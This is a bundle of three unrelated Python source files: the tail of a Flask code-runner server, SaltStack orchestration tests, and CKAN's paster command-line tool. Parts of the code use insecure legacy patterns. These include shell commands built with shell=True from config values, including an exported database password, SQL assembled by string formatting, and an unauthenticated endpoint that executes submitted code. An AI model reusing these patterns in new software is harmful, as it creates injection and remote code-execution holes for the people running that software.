thr = threading.Thread(target=server.run, kwargs={'port': FLASK_PORT})
thr.daemon = True # local server will exit automatically after main thread exits
thr.start()
@server.route('/code', methods=['PUT'])
def run():
from flask import request
res, ok = CodeRunner().run_code(request.json["is_input_from_file"], request.json["is_output_to_file"],
request.json["input"], request.json["output"], request.json["code"])
return {'console_output': res, 'pass': ok}
@server.route('/', methods=['GET'])
def index():
with open(INDEX_HTML_PATH) as f:
return f.read()
if __name__ == '__main__':
server.run(port=2998)
|
test_state.py
|
# -*- coding: utf-8 -*-
'''
Tests for the state runner
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import errno
import os
import shutil
import signal
import tempfile
import textwrap
import threading
from salt.ext.six.moves import queue
# Import Salt Testing Libs
from tests.support.case import ShellCase
from tests.support.unit import skipIf
from tests.support.paths import TMP
# Import Salt Libs
import salt.utils.platform
import salt.utils.event
import salt.utils.files
import salt.utils.json
import salt.utils.stringutils
import salt.utils.yaml
# Import 3rd-party libs
from salt.ext import six
class StateRunnerTest(ShellCase):
'''
Test the state runner.
'''
def add_to_queue(self, q, cmd):
'''
helper method to add salt-run
return data to a queue
'''
ret = self.run_run(cmd)
q.put(ret)
q.task_done()
def test_orchestrate_output(self):
'''
Ensure the orchestrate runner outputs useful state data.
In Issue #31330, the output only contains ['outputter:', ' highstate'],
        and not the full stateful return. This test ensures we don't regress in that
manner again.
Also test against some sample "good" output that would be included in a correct
orchestrate run.
'''
#ret_output = self.run_run_plus('state.orchestrate', 'orch.simple')['out']
ret_output = self.run_run('state.orchestrate orch.simple')
bad_out = ['outputter:', ' highstate']
good_out = [' Function: salt.state',
' Result: True',
'Succeeded: 1 (changed=1)',
'Failed: 0',
'Total states run: 1']
# First, check that we don't have the "bad" output that was displaying in
# Issue #31330 where only the highstate outputter was listed
self.assertIsNot(bad_out, ret_output)
# Now test that some expected good sample output is present in the return.
for item in good_out:
self.assertIn(item, ret_output)
def test_orchestrate_nested(self):
'''
test salt-run state.orchestrate and failhard with nested orchestration
'''
if os.path.exists('/tmp/ewu-2016-12-13'):
os.remove('/tmp/ewu-2016-12-13')
_, code = self.run_run(
'state.orchestrate nested-orch.outer',
with_retcode=True)
self.assertFalse(os.path.exists('/tmp/ewu-2016-12-13'))
self.assertNotEqual(code, 0)
def test_orchestrate_state_and_function_failure(self):
'''
Ensure that returns from failed minions are in the changes dict where
        they belong, so they can be programmatically analyzed.
See https://github.com/saltstack/salt/issues/43204
'''
self.run_run('saltutil.sync_modules')
ret = salt.utils.json.loads(
'\n'.join(
self.run_run('state.orchestrate orch.issue43204 --out=json')
)
)
# Drill down to the changes dict
state_ret = ret['data']['master']['salt_|-Step01_|-Step01_|-state']['changes']
func_ret = ret['data']['master']['salt_|-Step02_|-runtests_helpers.nonzero_retcode_return_false_|-function']['changes']
# Remove duration and start time from the results, since they would
# vary with each run and that would make it impossible to test.
for item in ('duration', 'start_time'):
state_ret['ret']['minion']['test_|-test fail with changes_|-test fail with changes_|-fail_with_changes'].pop(item)
self.assertEqual(
state_ret,
{
'out': 'highstate',
'ret': {
'minion': {
'test_|-test fail with changes_|-test fail with changes_|-fail_with_changes': {
'__id__': 'test fail with changes',
'__run_num__': 0,
'__sls__': 'orch.issue43204.fail_with_changes',
'changes': {
'testing': {
'new': 'Something pretended to change',
'old': 'Unchanged'
}
},
'comment': 'Failure!',
'name': 'test fail with changes',
'result': False,
}
}
}
}
)
self.assertEqual(
func_ret,
{'out': 'highstate', 'ret': {'minion': False}}
)
def test_orchestrate_target_exists(self):
'''
test orchestration when target exists
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-exists')
first = [' ID: core',
' Function: salt.state',
' Result: True']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_orchestrate_retcode(self):
'''
Test orchestration with nonzero retcode set in __context__
'''
self.run_run('saltutil.sync_runners')
self.run_run('saltutil.sync_wheel')
ret = '\n'.join(self.run_run('state.orchestrate orch.retcode'))
for result in (' ID: test_runner_success\n'
' Function: salt.runner\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_runner_failure\n'
' Function: salt.runner\n'
' Name: runtests_helpers.failure\n'
' Result: False',
' ID: test_wheel_success\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.success\n'
' Result: True',
' ID: test_wheel_failure\n'
' Function: salt.wheel\n'
' Name: runtests_helpers.failure\n'
' Result: False'):
self.assertIn(result, ret)
def test_orchestrate_target_doesnt_exists(self):
'''
        test orchestration when the target doesn't exist
while using multiple states
'''
ret = self.run_run('state.orchestrate orch.target-doesnt-exists')
first = ['No minions matched the target. No command was sent, no jid was assigned.',
' ID: core',
' Function: salt.state',
' Result: False']
second = [' ID: test-state',
' Function: salt.state',
' Result: True']
third = [' ID: cmd.run',
' Function: salt.function',
' Result: True']
ret_out = [first, second, third]
for out in ret_out:
for item in out:
self.assertIn(item, ret)
def test_state_event(self):
'''
test to ensure state.event
runner returns correct data
'''
q = queue.Queue(maxsize=0)
cmd = 'state.event salt/job/*/new count=1'
expect = '"minions": ["minion"]'
server_thread = threading.Thread(target=self.add_to_queue, args=(q, cmd))
server_thread.setDaemon(True)
server_thread.start()
while q.empty():
self.run_salt('minion test.ping --static')
out = q.get()
self.assertIn(expect, six.text_type(out))
server_thread.join()
@skipIf(salt.utils.platform.is_windows(), '*NIX-only test')
class OrchEventTest(ShellCase):
'''
Tests for orchestration events
'''
def setUp(self):
self.timeout = 60
self.master_d_dir = os.path.join(self.get_config_dir(), 'master.d')
try:
os.makedirs(self.master_d_dir)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
self.conf = tempfile.NamedTemporaryFile(
mode='w',
suffix='.conf',
dir=self.master_d_dir,
delete=True,
)
self.base_env = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, self.base_env)
self.addCleanup(self.conf.close)
for attr in ('timeout', 'master_d_dir', 'conf', 'base_env'):
self.addCleanup(delattr, self, attr)
# Force a reload of the configuration now that our temp config file has
# been removed.
self.addCleanup(self.run_run_plus, 'test.arg', __reload_config=True)
def alarm_handler(self, signal, frame):
raise Exception('Timeout of {0} seconds reached'.format(self.timeout))
def write_conf(self, data):
'''
Dump the config dict to the conf file
'''
self.conf.write(salt.utils.yaml.safe_dump(data, default_flow_style=False))
self.conf.flush()
def test_jid_in_ret_event(self):
'''
Test to confirm that the ret event for the orchestration contains the
jid for the jobs spawned.
'''
self.write_conf({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [self.base_env],
},
})
state_sls = os.path.join(self.base_env, 'test_state.sls')
with salt.utils.files.fopen(state_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date:
cmd.run
''')))
orch_sls = os.path.join(self.base_env, 'test_orch.sls')
with salt.utils.files.fopen(orch_sls, 'w') as fp_:
fp_.write(salt.utils.stringutils.to_str(textwrap.dedent('''
date_cmd:
salt.state:
- tgt: minion
- sls: test_state
ping_minion:
salt.function:
- name: test.ping
- tgt: minion
fileserver.file_list:
salt.runner
config.values:
salt.wheel
''')))
listener = salt.utils.event.get_event(
'master',
sock_dir=self.master_opts['sock_dir'],
transport=self.master_opts['transport'],
opts=self.master_opts)
jid = self.run_run_plus(
'state.orchestrate',
'test_orch',
__reload_config=True).get('jid')
if jid is None:
raise Exception('jid missing from run_run_plus output')
signal.signal(signal.SIGALRM, self.alarm_handler)
signal.alarm(self.timeout)
try:
while True:
event = listener.get_event(full=True)
if event is None:
continue
if event['tag'] == 'salt/run/{0}/ret'.format(jid):
# Don't wrap this in a try/except. We want to know if the
# data structure is different from what we expect!
ret = event['data']['return']['data']['master']
for job in ret:
self.assertTrue('__jid__' in ret[job])
break
finally:
del listener
signal.alarm(0)
|
cli.py
|
import collections
import csv
import multiprocessing as mp
import os
import datetime
import sys
from pprint import pprint
import re
import ckan.logic as logic
import ckan.model as model
import ckan.include.rjsmin as rjsmin
import ckan.include.rcssmin as rcssmin
import ckan.lib.fanstatic_resources as fanstatic_resources
import sqlalchemy as sa
import urlparse
import routes
import paste.script
from paste.registry import Registry
from paste.script.util.logging_config import fileConfig
#NB No CKAN imports are allowed until after the config file is loaded.
# i.e. do the imports in methods, after _load_config is called.
# Otherwise loggers get disabled.
def parse_db_config(config_key='sqlalchemy.url'):
''' Takes a config key for a database connection url and parses it into
a dictionary. Expects a url like:
'postgres://tester:pass@localhost/ckantest3'
'''
from pylons import config
url = config[config_key]
regex = [
'^\s*(?P<db_type>\w*)',
'://',
'(?P<db_user>[^:]*)',
':?',
'(?P<db_pass>[^@]*)',
'@',
'(?P<db_host>[^/:]*)',
':?',
'(?P<db_port>[^/]*)',
'/',
'(?P<db_name>[\w.-]*)'
]
db_details_match = re.match(''.join(regex), url)
if not db_details_match:
raise Exception('Could not extract db details from url: %r' % url)
db_details = db_details_match.groupdict()
return db_details
class MockTranslator(object):
def gettext(self, value):
return value
def ugettext(self, value):
return value
def ungettext(self, singular, plural, n):
if n > 1:
return plural
return singular
class CkanCommand(paste.script.command.Command):
'''Base class for classes that implement CKAN paster commands to inherit.
'''
parser = paste.script.command.Command.standard_parser(verbose=True)
parser.add_option('-c', '--config', dest='config',
default='development.ini', help='Config file to use.')
parser.add_option('-f', '--file',
action='store',
dest='file_path',
help="File to dump results to (if needed)")
default_verbosity = 1
group_name = 'ckan'
def _get_config(self):
from paste.deploy import appconfig
if not self.options.config:
msg = 'No config file supplied'
raise self.BadCommand(msg)
self.filename = os.path.abspath(self.options.config)
if not os.path.exists(self.filename):
raise AssertionError('Config filename %r does not exist.' % self.filename)
fileConfig(self.filename)
return appconfig('config:' + self.filename)
def _load_config(self):
conf = self._get_config()
assert 'ckan' not in dir() # otherwise loggers would be disabled
# We have now loaded the config. Now we can import ckan for the
# first time.
from ckan.config.environment import load_environment
load_environment(conf.global_conf, conf.local_conf)
self.registry=Registry()
self.registry.prepare()
import pylons
self.translator_obj = MockTranslator()
self.registry.register(pylons.translator, self.translator_obj)
if model.user_table.exists():
# If the DB has already been initialized, create and register
# a pylons context object, and add the site user to it, so the
# auth works as in a normal web request
c = pylons.util.AttribSafeContextObj()
self.registry.register(pylons.c, c)
self.site_user = logic.get_action('get_site_user')({'ignore_auth': True,
'defer_commit': True}, {})
pylons.c.user = self.site_user['name']
pylons.c.userobj = model.User.get(self.site_user['name'])
model.repo.commit_and_remove()
## give routes enough information to run url_for
parsed = urlparse.urlparse(conf.get('ckan.site_url', 'http://0.0.0.0'))
request_config = routes.request_config()
request_config.host = parsed.netloc + parsed.path
request_config.protocol = parsed.scheme
def _setup_app(self):
cmd = paste.script.appinstall.SetupCommand('setup-app')
cmd.run([self.filename])
class ManageDb(CkanCommand):
'''Perform various tasks on the database.
db create - alias of db upgrade
db init - create and put in default data
db clean
db upgrade [version no.] - Data migrate
db version - returns current version of data schema
db dump FILE_PATH - dump to a pg_dump file
db dump-rdf DATASET_NAME FILE_PATH
db simple-dump-csv FILE_PATH - dump just datasets in CSV format
db simple-dump-json FILE_PATH - dump just datasets in JSON format
db user-dump-csv FILE_PATH - dump user information to a CSV file
db send-rdf TALIS_STORE USERNAME PASSWORD
db load FILE_PATH - load a pg_dump from a file
db load-only FILE_PATH - load a pg_dump from a file but don\'t do
the schema upgrade or search indexing
db create-from-model - create database from the model (indexes not made)
    db migrate-filestore - migrate all uploaded data from the 2.1 filestore.
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 1
def command(self):
self._load_config()
import ckan.model as model
import ckan.lib.search as search
cmd = self.args[0]
if cmd == 'init':
model.repo.init_db()
if self.verbose:
print 'Initialising DB: SUCCESS'
elif cmd == 'clean' or cmd == 'drop':
# remove any *.pyc version files to prevent conflicts
v_path = os.path.join(os.path.dirname(__file__),
'..', 'migration', 'versions', '*.pyc')
import glob
filelist = glob.glob(v_path)
for f in filelist:
os.remove(f)
model.repo.clean_db()
search.clear()
if self.verbose:
print 'Cleaning DB: SUCCESS'
elif cmd == 'upgrade':
if len(self.args) > 1:
model.repo.upgrade_db(self.args[1])
else:
model.repo.upgrade_db()
elif cmd == 'version':
self.version()
elif cmd == 'dump':
self.dump()
elif cmd == 'load':
self.load()
elif cmd == 'load-only':
self.load(only_load=True)
elif cmd == 'simple-dump-csv':
self.simple_dump_csv()
elif cmd == 'simple-dump-json':
self.simple_dump_json()
elif cmd == 'dump-rdf':
self.dump_rdf()
elif cmd == 'user-dump-csv':
self.user_dump_csv()
elif cmd == 'create-from-model':
model.repo.create_db()
if self.verbose:
print 'Creating DB: SUCCESS'
elif cmd == 'send-rdf':
self.send_rdf()
elif cmd == 'migrate-filestore':
self.migrate_filestore()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def _get_db_config(self):
return parse_db_config()
def _get_postgres_cmd(self, command):
self.db_details = self._get_db_config()
if self.db_details.get('db_type') not in ('postgres', 'postgresql'):
raise AssertionError('Expected postgres database - not %r' % self.db_details.get('db_type'))
pg_cmd = command
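        # Append connection details only when they are configured; the password is supplied via PGPASSWORD in the environment.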
pg_cmd += ' -U %(db_user)s' % self.db_details
if self.db_details.get('db_pass') not in (None, ''):
pg_cmd = 'export PGPASSWORD=%(db_pass)s && ' % self.db_details + pg_cmd
if self.db_details.get('db_host') not in (None, ''):
pg_cmd += ' -h %(db_host)s' % self.db_details
if self.db_details.get('db_port') not in (None, ''):
pg_cmd += ' -p %(db_port)s' % self.db_details
return pg_cmd
def _get_psql_cmd(self):
psql_cmd = self._get_postgres_cmd('psql')
psql_cmd += ' -d %(db_name)s' % self.db_details
return psql_cmd
def _postgres_dump(self, filepath):
pg_dump_cmd = self._get_postgres_cmd('pg_dump')
pg_dump_cmd += ' %(db_name)s' % self.db_details
pg_dump_cmd += ' > %s' % filepath
self._run_cmd(pg_dump_cmd)
print 'Dumped database to: %s' % filepath
def _postgres_load(self, filepath):
import ckan.model as model
assert not model.repo.are_tables_created(), "Tables already found. You need to 'db clean' before a load."
pg_cmd = self._get_psql_cmd() + ' -f %s' % filepath
self._run_cmd(pg_cmd)
print 'Loaded CKAN database: %s' % filepath
def _run_cmd(self, command_line):
import subprocess
retcode = subprocess.call(command_line, shell=True)
if retcode != 0:
raise SystemError('Command exited with errorcode: %i' % retcode)
def dump(self):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_dump(dump_path)
def load(self, only_load=False):
if len(self.args) < 2:
print 'Need pg_dump filepath'
return
dump_path = self.args[1]
psql_cmd = self._get_psql_cmd() + ' -f %s'
pg_cmd = self._postgres_load(dump_path)
if not only_load:
print 'Upgrading DB'
import ckan.model as model
model.repo.upgrade_db()
print 'Rebuilding search index'
import ckan.lib.search
ckan.lib.search.rebuild()
else:
print 'Now remember you have to call \'db upgrade\' and then \'search-index rebuild\'.'
print 'Done'
def simple_dump_csv(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='csv')
def simple_dump_json(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need json file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.SimpleDumper().dump(dump_file, format='json')
def dump_rdf(self):
if len(self.args) < 3:
print 'Need dataset name and rdf file path'
return
package_name = self.args[1]
rdf_path = self.args[2]
import ckan.model as model
import ckan.lib.rdf as rdf
pkg = model.Package.by_name(unicode(package_name))
if not pkg:
print 'Dataset name "%s" does not exist' % package_name
return
rdf = rdf.RdfExporter().export_package(pkg)
f = open(rdf_path, 'w')
f.write(rdf)
f.close()
def user_dump_csv(self):
if len(self.args) < 2:
print 'Need csv file path'
return
dump_filepath = self.args[1]
import ckan.lib.dumper as dumper
dump_file = open(dump_filepath, 'w')
dumper.UserDumper().dump(dump_file)
def send_rdf(self):
if len(self.args) < 4:
print 'Need all arguments: {talis-store} {username} {password}'
return
talis_store = self.args[1]
username = self.args[2]
password = self.args[3]
import ckan.lib.talis
talis = ckan.lib.talis.Talis()
return talis.send_rdf(talis_store, username, password)
def migrate_filestore(self):
from ckan.model import Session
import requests
from ckan.lib.uploader import ResourceUpload
results = Session.execute("select id, revision_id, url from resource "
"where resource_type = 'file.upload' "
"and (url_type <> 'upload' or url_type is null)"
"and url like '%storage%'")
for id, revision_id, url in results:
response = requests.get(url, stream=True)
if response.status_code != 200:
print "failed to fetch %s (code %s)" % (url,
response.status_code)
continue
resource_upload = ResourceUpload({'id': id})
assert resource_upload.storage_path, "no storage configured aborting"
directory = resource_upload.get_directory(id)
filepath = resource_upload.get_path(id)
try:
os.makedirs(directory)
except OSError, e:
## errno 17 is file already exists
if e.errno != 17:
raise
with open(filepath, 'wb+') as out:
for chunk in response.iter_content(1024):
if chunk:
out.write(chunk)
Session.execute("update resource set url_type = 'upload'"
"where id = '%s'" % id)
Session.execute("update resource_revision set url_type = 'upload'"
"where id = '%s' and "
"revision_id = '%s'" % (id, revision_id))
Session.commit()
print "Saved url %s" % url
def version(self):
from ckan.model import Session
print Session.execute('select version from migrate_version;').fetchall()
class SearchIndexCommand(CkanCommand):
'''Creates a search index for all datasets
Usage:
search-index [-i] [-o] [-r] [-e] rebuild [dataset_name] - reindex dataset_name if given, if not then rebuild
full search index (all datasets)
search-index rebuild_fast - reindex using multiprocessing using all cores.
        This acts in the same way as rebuild -r [EXPERIMENTAL]
search-index check - checks for datasets not indexed
search-index show DATASET_NAME - shows index of a dataset
search-index clear [dataset_name] - clears the search index for the provided dataset or
for the whole ckan instance
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def __init__(self,name):
super(SearchIndexCommand,self).__init__(name)
self.parser.add_option('-i', '--force', dest='force',
action='store_true', default=False, help='Ignore exceptions when rebuilding the index')
self.parser.add_option('-o', '--only-missing', dest='only_missing',
action='store_true', default=False, help='Index non indexed datasets only')
self.parser.add_option('-r', '--refresh', dest='refresh',
action='store_true', default=False, help='Refresh current index (does not clear the existing one)')
self.parser.add_option('-e', '--commit-each', dest='commit_each',
action='store_true', default=False, help=
'''Perform a commit after indexing each dataset. This ensures that changes are
            immediately available in search, but significantly slows down the process.
Default is false.'''
)
def command(self):
if not self.args:
# default to printing help
print self.usage
return
cmd = self.args[0]
# Do not run load_config yet
if cmd == 'rebuild_fast':
self.rebuild_fast()
return
self._load_config()
if cmd == 'rebuild':
self.rebuild()
elif cmd == 'check':
self.check()
elif cmd == 'show':
self.show()
elif cmd == 'clear':
self.clear()
else:
print 'Command %s not recognized' % cmd
def rebuild(self):
from ckan.lib.search import rebuild, commit
# BY default we don't commit after each request to Solr, as it is
# a really heavy operation and slows things a lot
if len(self.args) > 1:
rebuild(self.args[1])
else:
rebuild(only_missing=self.options.only_missing,
force=self.options.force,
refresh=self.options.refresh,
defer_commit=(not self.options.commit_each))
if not self.options.commit_each:
commit()
def check(self):
from ckan.lib.search import check
check()
def show(self):
from ckan.lib.search import show
if not len(self.args) == 2:
print 'Missing parameter: dataset-name'
return
index = show(self.args[1])
pprint(index)
def clear(self):
from ckan.lib.search import clear
        package_id = self.args[1] if len(self.args) > 1 else None
clear(package_id)
def rebuild_fast(self):
### Get out config but without starting pylons environment ####
conf = self._get_config()
### Get ids using own engine, otherwise multiprocess will balk
db_url = conf['sqlalchemy.url']
engine = sa.create_engine(db_url)
package_ids = []
result = engine.execute("select id from package where state = 'active';")
for row in result:
package_ids.append(row[0])
def start(ids):
            ## load the actual environment for each subprocess, so each has its
            ## own sa session
self._load_config()
from ckan.lib.search import rebuild, commit
rebuild(package_ids=ids)
commit()
def chunks(l, n):
""" Yield n successive chunks from l.
"""
newn = int(len(l) / n)
for i in xrange(0, n-1):
yield l[i*newn:i*newn+newn]
yield l[n*newn-newn:]
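        # Illustrative behaviour of chunks(): chunks(range(10), 3) yields
        # [0, 1, 2], [3, 4, 5] and then the remainder [6, 7, 8, 9] as the last chunk.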
processes = []
for chunk in chunks(package_ids, mp.cpu_count()):
process = mp.Process(target=start, args=(chunk,))
processes.append(process)
process.daemon = True
process.start()
for process in processes:
process.join()
class Notification(CkanCommand):
'''Send out modification notifications.
In "replay" mode, an update signal is sent for each dataset in the database.
Usage:
notify replay - send out modification signals
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 1
min_args = 0
def command(self):
self._load_config()
from ckan.model import Session, Package, DomainObjectOperation
from ckan.model.modification import DomainObjectModificationExtension
if not self.args:
# default to run
cmd = 'replay'
else:
cmd = self.args[0]
if cmd == 'replay':
dome = DomainObjectModificationExtension()
for package in Session.query(Package):
dome.notify(package, DomainObjectOperation.changed)
else:
print 'Command %s not recognized' % cmd
class RDFExport(CkanCommand):
'''Export active datasets as RDF
This command dumps out all currently active datasets as RDF into the
specified folder.
Usage:
paster rdf-export /path/to/store/output
'''
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
self._load_config()
if not self.args:
# default to run
print RDFExport.__doc__
else:
self.export_datasets( self.args[0] )
def export_datasets(self, out_folder):
'''
Export datasets as RDF to an output folder.
'''
import urlparse
import urllib2
import pylons.config as config
import ckan.model as model
import ckan.logic as logic
import ckan.lib.helpers as h
# Create output folder if not exists
if not os.path.isdir( out_folder ):
os.makedirs( out_folder )
fetch_url = config['ckan.site_url']
user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {'model': model, 'session': model.Session, 'user': user['name']}
dataset_names = logic.get_action('package_list')(context, {})
for dataset_name in dataset_names:
dd = logic.get_action('package_show')(context, {'id':dataset_name })
if not dd['state'] == 'active':
continue
url = h.url_for( controller='package',action='read',
id=dd['name'])
url = urlparse.urljoin(fetch_url, url[1:]) + '.rdf'
try:
fname = os.path.join( out_folder, dd['name'] ) + ".rdf"
r = urllib2.urlopen(url).read()
with open(fname, 'wb') as f:
f.write(r)
except IOError, ioe:
sys.stderr.write( str(ioe) + "\n" )
class Sysadmin(CkanCommand):
'''Gives sysadmin rights to a named user
Usage:
sysadmin - lists sysadmins
sysadmin list - lists sysadmins
sysadmin add USERNAME - add a user as a sysadmin
sysadmin remove USERNAME - removes user from sysadmins
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 2
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
cmd = self.args[0] if self.args else None
if cmd == None or cmd == 'list':
self.list()
elif cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
else:
print 'Command %s not recognized' % cmd
def list(self):
import ckan.model as model
print 'Sysadmins:'
sysadmins = model.Session.query(model.User).filter_by(sysadmin=True)
print 'count = %i' % sysadmins.count()
for sysadmin in sysadmins:
print '%s name=%s id=%s' % (sysadmin.__class__.__name__,
sysadmin.name,
sysadmin.id)
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user to be made sysadmin.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'User "%s" not found' % username
makeuser = raw_input('Create new user: %s? [y/n]' % username)
if makeuser == 'y':
password = UserCmd.password_prompt()
print('Creating %s user' % username)
user = model.User(name=unicode(username),
password=password)
else:
print 'Exiting ...'
return
user.sysadmin = True
model.Session.add(user)
model.repo.commit_and_remove()
print 'Added %s as sysadmin' % username
def remove(self):
import ckan.model as model
if len(self.args) < 2:
            print 'Need name of the user to be removed from sysadmins.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.sysadmin = False
model.repo.commit_and_remove()
class UserCmd(CkanCommand):
'''Manage users
Usage:
user - lists users
user list - lists users
user USERNAME - shows user properties
user add USERNAME [FIELD1=VALUE1 FIELD2=VALUE2 ...]
- add a user (prompts for password
if not supplied).
Field can be: apikey
password
email
user setpass USERNAME - set user password (prompts)
user remove USERNAME - removes user from users
user search QUERY - searches for a user name
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = None
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
self.list()
else:
cmd = self.args[0]
if cmd == 'add':
self.add()
elif cmd == 'remove':
self.remove()
elif cmd == 'search':
self.search()
elif cmd == 'setpass':
self.setpass()
elif cmd == 'list':
self.list()
else:
self.show()
def get_user_str(self, user):
user_str = 'name=%s' % user.name
if user.name != user.display_name:
user_str += ' display=%s' % user.display_name
return user_str
def list(self):
import ckan.model as model
print 'Users:'
users = model.Session.query(model.User)
print 'count = %i' % users.count()
for user in users:
print self.get_user_str(user)
def show(self):
import ckan.model as model
username = self.args[0]
user = model.User.get(unicode(username))
print 'User: \n', user
def setpass(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.get(username)
print('Editing user: %r' % user.name)
password = self.password_prompt()
user.password = password
model.repo.commit_and_remove()
print 'Done'
def search(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need user name query string.'
return
query_str = self.args[1]
query = model.User.search(query_str)
print '%i users matching %r:' % (query.count(), query_str)
for user in query.all():
print self.get_user_str(user)
@classmethod
def password_prompt(cls):
import getpass
password1 = None
while not password1:
password1 = getpass.getpass('Password: ')
password2 = getpass.getpass('Confirm password: ')
if password1 != password2:
print 'Passwords do not match'
sys.exit(1)
return password1
def add(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
sys.exit(1)
username = self.args[1]
# parse args into data_dict
data_dict = {'name': username}
for arg in self.args[2:]:
try:
field, value = arg.split('=', 1)
data_dict[field] = value
except ValueError:
raise ValueError('Could not parse arg: %r (expected "<option>=<value>)"' % arg)
if 'password' not in data_dict:
data_dict['password'] = self.password_prompt()
print('Creating user: %r' % username)
try:
import ckan.logic as logic
site_user = logic.get_action('get_site_user')({'model': model, 'ignore_auth': True}, {})
context = {
'model': model,
'session': model.Session,
'ignore_auth': True,
'user': site_user['name'],
}
user_dict = logic.get_action('user_create')(context, data_dict)
pprint(user_dict)
except logic.ValidationError, e:
print e
sys.exit(1)
def remove(self):
import ckan.model as model
if len(self.args) < 2:
print 'Need name of the user.'
return
username = self.args[1]
user = model.User.by_name(unicode(username))
if not user:
print 'Error: user "%s" not found!' % username
return
user.delete()
model.repo.commit_and_remove()
print('Deleted user: %s' % username)
class DatasetCmd(CkanCommand):
'''Manage datasets
Usage:
dataset DATASET_NAME|ID - shows dataset properties
dataset show DATASET_NAME|ID - shows dataset properties
dataset list - lists datasets
dataset delete [DATASET_NAME|ID] - changes dataset state to 'deleted'
dataset purge [DATASET_NAME|ID] - removes dataset from db entirely
'''
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 3
min_args = 0
def command(self):
self._load_config()
import ckan.model as model
if not self.args:
print self.usage
else:
cmd = self.args[0]
if cmd == 'delete':
self.delete(self.args[1])
elif cmd == 'purge':
self.purge(self.args[1])
elif cmd == 'list':
self.list()
elif cmd == 'show':
self.show(self.args[1])
else:
self.show(self.args[0])
def list(self):
import ckan.model as model
print 'Datasets:'
datasets = model.Session.query(model.Package)
print 'count = %i' % datasets.count()
for dataset in datasets:
state = ('(%s)' % dataset.state) if dataset.state != 'active' \
else ''
print '%s %s %s' % (dataset.id, dataset.name, state)
def _get_dataset(self, dataset_ref):
import ckan.model as model
dataset = model.Package.get(unicode(dataset_ref))
assert dataset, 'Could not find dataset matching reference: %r' % dataset_ref
return dataset
def show(self, dataset_ref):
import pprint
dataset = self._get_dataset(dataset_ref)
pprint.pprint(dataset.as_dict())
def delete(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
old_state = dataset.state
rev = model.repo.new_revision()
dataset.delete()
model.repo.commit_and_remove()
dataset = self._get_dataset(dataset_ref)
print '%s %s -> %s' % (dataset.name, old_state, dataset.state)
def purge(self, dataset_ref):
import ckan.model as model
dataset = self._get_dataset(dataset_ref)
name = dataset.name
rev = model.repo.new_revision()
dataset.purge()
model.repo.commit_and_remove()
print '%s purged' % name
class Celery(CkanCommand):
'''Celery daemon
Usage:
celeryd <run> - run the celery daemon
celeryd run concurrency - run the celery daemon with
argument 'concurrency'
celeryd view - view all tasks in the queue
celeryd clean - delete all tasks in the queue
'''
min_args = 0
max_args = 2
summary = __doc__.split('\n')[0]
usage = __doc__
def command(self):
if not self.args:
self.run_()
else:
cmd = self.args[0]
if cmd == 'run':
self.run_()
elif cmd == 'view':
self.view()
elif cmd == 'clean':
self.clean()
else:
print 'Command %s not recognized' % cmd
sys.exit(1)
def run_(self):
os.environ['CKAN_CONFIG'] = os.path.abspath(self.options.config)
from ckan.lib.celery_app import celery
celery_args = []
if len(self.args) == 2 and self.args[1] == 'concurrency':
            celery_args.append('--concurrency=1')
celery.worker_main(argv=['celeryd', '--loglevel=INFO'] + celery_args)
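        # e.g. 'paster celeryd run concurrency' launches the worker roughly as
        # argv=['celeryd', '--loglevel=INFO', '--concurrency=1']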
def view(self):
self._load_config()
import ckan.model as model
from kombu.transport.sqlalchemy.models import Message
q = model.Session.query(Message)
q_visible = q.filter_by(visible=True)
print '%i messages (total)' % q.count()
print '%i visible messages' % q_visible.count()
for message in q:
if message.visible:
print '%i: Visible' % (message.id)
else:
print '%i: Invisible Sent:%s' % (message.id, message.sent_at)
def clean(self):
self._load_config()
import ckan.model as model
query = model.Session.execute("select * from kombu_message")
tasks_initially = query.rowcount
if not tasks_initially:
print 'No tasks to delete'
sys.exit(0)
query = model.Session.execute("delete from kombu_message")
query = model.Session.execute("select * from kombu_message")
tasks_afterwards = query.rowcount
print '%i of %i tasks deleted' % (tasks_initially - tasks_afterwards,
tasks_initially)
if tasks_afterwards:
print 'ERROR: Failed to delete all tasks'
sys.exit(1)
